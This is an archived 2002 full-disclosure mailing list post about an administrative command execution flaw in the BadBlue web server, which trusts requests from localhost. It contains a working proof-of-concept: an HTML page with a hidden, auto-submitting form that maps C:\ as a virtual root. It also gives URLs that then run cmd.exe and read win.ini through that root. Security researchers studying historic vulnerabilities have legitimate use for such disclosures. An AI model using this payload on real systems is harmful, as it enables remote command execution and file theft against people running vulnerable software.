BadBlue - Unauthorized Administrative Command Execution

From: Matthew Murphy (mattmurphyat_private)
Date: Sat Jul 20 2002 - 09:27:44 PDT

  • Next message: Matthew Murphy: "[Full-Disclosure] PHP Resource Exhaustion Denial of Service"

    BadBlue uses an address-based security mechanism to lock administrative
    code to outsiders, specifically verifying that the requesting system is the
    local
    user.
    
    An interesting security-sensitive scenario comes into play when a user uses
    their system for browsing.  If the server system were used to visit this
    page:
    
    <HTML>
    <HEAD>
    <FORM ACTION=http://localhost/ext.dll METHOD=GET>
    <INPUT TYPE=hidden NAME=MfcISAPICommand VALUE=LoadPage>
    <INPUT TYPE=hidden NAME=page VALUE=dir.hts>
    <INPUT TYPE=hidden NAME=a0 VALUE=add>
    <INPUT TYPE=hidden NAME=a2 VALUE=hd>
    <INPUT TYPE=hidden NAME=a1 VALUE=C:\>
    </FORM>
    </HEAD>
    <BODY ONLOAD="document.forms(0).submit()" />
    </HTML>
    
    Then an attack would be conducted that would add the "hd" virtual root and
    point it to C:\.
    
    This occurs because, even though the page content originated elsewhere,
    the request to submit the form originated from the client sitting on the
    BadBlue
    machine.
    
    http://localhost/hd/winnt/system32/cmd.exe?/c+echo+hello
    
    This will display "hello" to a console window if running BadBlue EE on WinNT
    after this exploit.
    
    http://localhost/hd/winnt/win.ini
    http://localhost/hd/windows/win.ini
    
    Have a look at your Win.ini from the web... :-D
    I love insecure web admin packages...
    
    "The reason the mainstream is thought
    of as a stream is because it is
    so shallow."
                         - Author Unknown
    



    This archive was generated by hypermail 2b30 : Sat Jul 20 2002 - 13:12:23 PDT